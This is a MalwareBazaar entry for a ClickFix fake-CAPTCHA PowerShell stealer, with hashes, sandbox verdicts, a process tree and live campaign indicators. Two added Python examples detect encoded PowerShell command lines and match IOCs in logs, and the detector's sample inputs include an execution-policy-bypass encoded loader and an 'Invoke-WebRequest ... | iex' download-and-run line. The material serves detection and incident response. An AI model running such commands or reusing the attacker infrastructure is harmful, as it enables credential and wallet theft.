MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 9



SHA256 hash: 6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94
SHA3-384 hash: a4d097dd815ed43c068cff63f33f7163223278d76ba9c5c33fe9fdf4bfccc907ab27f5351be6f28cdeb5b4bfc13e42dd
SHA1 hash: 3fe59ad1877fdeb09846d4be8918996842ff9a00
MD5 hash: cbd24e3bdf207215f7c4467cd25951c9
humanhash: five-fourteen-seventeen-timing
File name: 6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94.ps1
File size: 5'879 bytes
First seen: 2025-05-13 06:43:47 UTC
Last seen: Never
File type: PowerShell (PS) ps1
MIME type: text/plain
ssdeep: 96:/6atSq/9086BO2t624+cEkabKaY8tfnAilqHQs7JRXa26uai8gbFPayuFF1M6mV4:/6atN/90lP624JEka+n8tvANLJ+i8g0X
TLSH: T157C1FE7AC931FDA4836D364051281D5A22845E17D3B31E7CCA297CF67E21716EF26A8C
Magika: powershell
Reporter: JAMESWT_WT
Tags: 195-201-108-189 apioeaesr-icu booking ClickFix fakepcaptcha ps1

Intelligence


File Origin
Number of uploads: 1
Number of downloads: 101
Origin country: IT
Vendor Threat Intelligence
Verdict: Malicious
Score: 99.1%
Tags: obfuscate xtreme shell

Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: base64 evasive obfuscated packed powershell
Result
Threat name: n/a
Detection: malicious
Classification: spyw.evad
Score: 100 / 100
Signature
AI detected malicious Powershell script
Antivirus / Scanner detection for submitted sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Yara detected Powershell decode and execute
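The signature list above flags an encoded command line, an execution-policy bypass and two Sigma hits for base64-encoded keywords. The following is an added example, not code from MalwareBazaar or from any of the sandbox vendors, showing the logic behind those detections: powershell.exe -EncodedCommand takes base64 of UTF-16LE text, and because base64 packs three bytes into four characters a keyword has three possible encodings depending on its byte offset, so a rule can match the keyword inside the blob without decoding it (this is how the referenced Sigma rules work). The command lines it runs over are constructed to imitate ClickFix-style lures and are not taken from this sample; the regular expressions for the -EncodedCommand and -ExecutionPolicy prefixes are this example's own.

```python
from __future__ import annotations

import base64
import re

# Keywords behind the "PowerShell Base64 Encoded FromBase64String Cmdlet" and
# "PowerShell Base64 Encoded Invoke Keyword" Sigma hits. The Sigma rules are
# case-sensitive on the keyword; add lower-case spellings if you need them.
KEYWORDS = ("FromBase64String", "Invoke")


def encoded_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def base64_variants(keyword: str) -> list[str]:
    """Return the three base64 fragments a UTF-16LE keyword can produce.

    base64 maps 3 input bytes to 4 characters, so the encoding of a substring
    depends on its byte offset modulo 3. Encoding the keyword behind 0, 1 and 2
    filler bytes covers all three alignments; the first and last 4 characters
    are dropped because they depend on the filler and on padding, and what is
    left is stable for any script that contains the keyword at that alignment.
    """
    raw = keyword.encode("utf-16-le")
    variants = []
    for offset in range(3):
        enc = base64.b64encode(b"\x00" * offset + raw).decode("ascii")
        variants.append(enc[4:-4])
    return variants


# -e, -ec, -en, -enc, ... -EncodedCommand (any unambiguous prefix) followed by base64.
ENC_FLAG = re.compile(r"(?i)(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
# -ep / -ex... / -ExecutionPolicy with a value that disables script-signing checks.
EP_BYPASS = re.compile(r"(?i)-e(?:p|x[a-z]*)\s+(?:bypass|unrestricted)")
INVOKE_EXPR = re.compile(r"(?i)\biex\b|Invoke-Expression")


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the plaintext behind -EncodedCommand, or None if absent or not decodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Classify one powershell.exe command line; returns the decoded text and finding names."""
    findings = []
    if EP_BYPASS.search(cmdline):
        findings.append("execution_policy_bypass")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded_command")
    # Sigma-style check: match the keyword inside the base64 without decoding it.
    for kw in KEYWORDS:
        if any(v in cmdline for v in base64_variants(kw)):
            findings.append(f"base64_encoded_{kw}")
    # After decoding, a plain case-insensitive search is enough.
    for kw in KEYWORDS:
        if decoded is not None and kw.lower() in decoded.lower():
            findings.append(f"decoded_contains_{kw}")
    if INVOKE_EXPR.search(cmdline + " " + (decoded or "")):
        findings.append("invoke_expression")
    return {"cmdline": cmdline, "decoded": decoded, "findings": findings}


# Constructed sample command lines (not from this sample).
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -ep bypass -enc " + encoded_command(
        'IEX ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aGVsbG8=")))'),
    'powershell.exe -NoProfile -ExecutionPolicy Unrestricted -Command '
    '"Invoke-WebRequest https://example.invalid/x.ps1 | iex"',
    'powershell.exe -Command "Get-ChildItem C:\\Users"',
]

if __name__ == "__main__":
    for result in map(analyze, SAMPLE_CMDLINES):
        print(result["findings"], "<-", result["cmdline"][:60])
```

The base64 check is what makes the rule cheap to run on raw process-creation telemetry; decoding is still worth doing when the event is available, because a keyword split across an obfuscation boundary (string concatenation, backtick escapes) will not be visible in the blob.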
Behaviour
Behavior Graph:
Behavior Graph ID: 1688609
Sample: khuYmeJA58.ps1
Start date: 13/05/2025
Architecture: WINDOWS
Score: 100

Contacted hosts:
- apioeaesr.icu (104.21.14.228:443, CLOUDFLARENET, United States), contacted by the child powershell.exe, which then dropped a PE32+ executable
- 195.201.108.189:33336 (HETZNER-AS, Germany), contacted by the dropped executable
- www.ip-api.com (208.95.112.1:80, TUT-AS, United States), contacted by the dropped executable
(49685, 49688, 49689 and 49690 are the ephemeral client-side ports recorded in the sandbox.)

Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 6 other signatures

Process tree:
powershell.exe  [Suspicious powershell command line found; Found many strings related to Crypto-Wallets (likely being stolen); Encrypted powershell cmdline option found; 2 other signatures]
  powershell.exe  [connects to apioeaesr.icu 104.21.14.228:443; drops 237b2cb5-30d4-4431-8a71-932a0529b376.exe (PE32+)]
    237b2cb5-30d4-4431-8a71-932a0529b376.exe  [connects to 195.201.108.189:33336 and www.ip-api.com 208.95.112.1:80; Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets; Found direct / indirect Syscall (likely to bypass EDR)]
      powershell.exe  [Loading BitLocker PowerShell Module]
        conhost.exe
      powershell.exe
        conhost.exe
      powershell.exe
        conhost.exe
      47 other processes
        conhost.exe (three instances shown), 44 other processes
  conhost.exe
237b2cb5-30d4-4431-8a71-932a0529b376.exe  (also started directly from the sample root)  [Found direct / indirect Syscall (likely to bypass EDR)]
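The behaviour graph yields network and file IOCs of very different quality: the .icu domain and the Hetzner endpoint on port 33336 are specific to this campaign, while 104.21.14.228 is a Cloudflare edge address shared with unrelated sites and ip-api.com is a legitimate geolocation service the stealer merely queries. The following is an added example, not part of the MalwareBazaar entry or any vendor's tooling, that matches those IOCs against log records with a confidence level attached to each, upgrading a Cloudflare hit only when the TLS SNI names the malicious host. The log lines and the record shape (a dict with a "type" of "dns", "conn" or "file") are constructed for the example; map your own Sysmon, Zeek or EDR fields onto it.

```python
from __future__ import annotations

import json

# Indicators taken from the behaviour graph above, with the confidence a
# responder should attach to each.
DOMAIN_IOCS = {
    "apioeaesr.icu": ("high", "stage-2 payload download (PE32+ dropped by powershell.exe)"),
    "www.ip-api.com": ("info", "public geolocation API; used by the stealer, but also by legitimate software"),
}

ENDPOINT_IOCS = {  # (destination IP, destination port)
    ("195.201.108.189", 33336): ("high", "stealer C2, HETZNER-AS, non-standard port"),
    ("104.21.14.228", 443): ("low", "Cloudflare edge IP shared with unrelated sites; only the SNI/Host is specific"),
    ("208.95.112.1", 80): ("info", "ip-api.com; legitimate service"),
}

HASH_IOCS = {
    "6139b9c2f149c915db0b29f9659909b84fc6c746cf8e951fbdfa3e23f9598e94": "sha256",
    "3fe59ad1877fdeb09846d4be8918996842ff9a00": "sha1",
    "cbd24e3bdf207215f7c4467cd25951c9": "md5",
}

DROPPED_EXE = "237b2cb5-30d4-4431-8a71-932a0529b376.exe"


def domain_matches(name: str, ioc: str) -> bool:
    """True if name equals ioc or is a subdomain of it (case-insensitive, trailing dot tolerated)."""
    name = name.rstrip(".").lower()
    return name == ioc or name.endswith("." + ioc)


def match_record(rec: dict) -> list[tuple[str, str, str]]:
    """Return (confidence, indicator, context) hits for one normalised log record."""
    hits = []
    kind = rec.get("type")
    if kind == "dns":
        for ioc, (conf, ctx) in DOMAIN_IOCS.items():
            if domain_matches(rec.get("query", ""), ioc):
                hits.append((conf, ioc, ctx))
    elif kind == "conn":
        key = (rec.get("dst"), rec.get("dport"))
        if key in ENDPOINT_IOCS:
            conf, ctx = ENDPOINT_IOCS[key]
            # A shared CDN IP alone is weak evidence; with the malicious SNI it is strong.
            sni = rec.get("sni", "")
            if conf == "low" and any(domain_matches(sni, d) for d, (c, _) in DOMAIN_IOCS.items() if c == "high"):
                conf, ctx = "high", f"{ctx}; TLS SNI {sni} is the malicious host"
            hits.append((conf, f"{key[0]}:{key[1]}", ctx))
    elif kind == "file":
        for algo_field in ("sha256", "sha1", "md5"):
            h = rec.get(algo_field, "").lower()
            if h in HASH_IOCS:
                hits.append(("high", h, f"{HASH_IOCS[h]} of this ClickFix .ps1"))
        if rec.get("name", "").lower() == DROPPED_EXE:
            hits.append(("medium", DROPPED_EXE, "name of the PE32+ dropped in the sandbox; names are cheap to change"))
    return hits


def triage(lines: list[str]) -> dict[str, list[tuple[str, str, str]]]:
    """Run match_record over JSON-lines log text and bucket the hits by confidence."""
    out = {"high": [], "medium": [], "low": [], "info": []}
    for line in lines:
        for conf, ind, ctx in match_record(json.loads(line)):
            out[conf].append((conf, ind, ctx))
    return out


# Constructed log lines (not captured traffic); the client ports mirror the sandbox report.
SAMPLE_LOG = [
    '{"type": "dns", "query": "apioeaesr.icu.", "host": "WS-17"}',
    '{"type": "conn", "dst": "104.21.14.228", "dport": 443, "sport": 49685, "sni": "apioeaesr.icu", "host": "WS-17"}',
    '{"type": "conn", "dst": "104.21.14.228", "dport": 443, "sport": 51002, "sni": "example.org", "host": "WS-22"}',
    '{"type": "file", "name": "237B2CB5-30D4-4431-8A71-932A0529B376.exe", "host": "WS-17"}',
    '{"type": "conn", "dst": "208.95.112.1", "dport": 80, "sport": 49688, "host": "WS-17"}',
    '{"type": "conn", "dst": "195.201.108.189", "dport": 33336, "sport": 49689, "host": "WS-17"}',
    '{"type": "file", "name": "khuYmeJA58.ps1", "sha256": "6139B9C2F149C915DB0B29F9659909B84FC6C746CF8E951FBDFA3E23F9598E94", "host": "WS-17"}',
]

if __name__ == "__main__":
    for level, hits in triage(SAMPLE_LOG).items():
        for _, indicator, context in hits:
            print(f"{level:6} {indicator}  ({context})")
```

Blocking 104.21.14.228 or 208.95.112.1 outright would break unrelated traffic; the domain, the SNI and the Hetzner IP:port pair are the indicators worth alerting on, and the dropped-file name is kept at medium because it is a random GUID the dropper can regenerate.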
Threat name: Script-PowerShell.Trojan.FakeCaptcha
Status: Malicious
First seen: 2025-05-13 06:42:06 UTC
File Type: Text (Batch)
AV detection: 9 of 22 (40.91%)
Threat level: 5/5
Result
Malware family: n/a
Score: 8/10
Tags: execution spyware stealer
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Drops file in System32 directory
Accesses cryptocurrency files/wallets, possible credential harvesting
Executes dropped EXE
Reads user/profile data of web browsers
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments